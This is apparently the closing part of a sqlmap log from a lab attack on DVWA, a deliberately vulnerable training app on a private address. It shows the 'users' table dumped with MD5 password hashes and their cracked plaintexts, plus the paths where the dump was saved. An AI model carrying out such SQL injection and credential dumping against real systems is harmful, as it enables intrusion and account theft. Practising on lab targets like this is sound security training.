| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/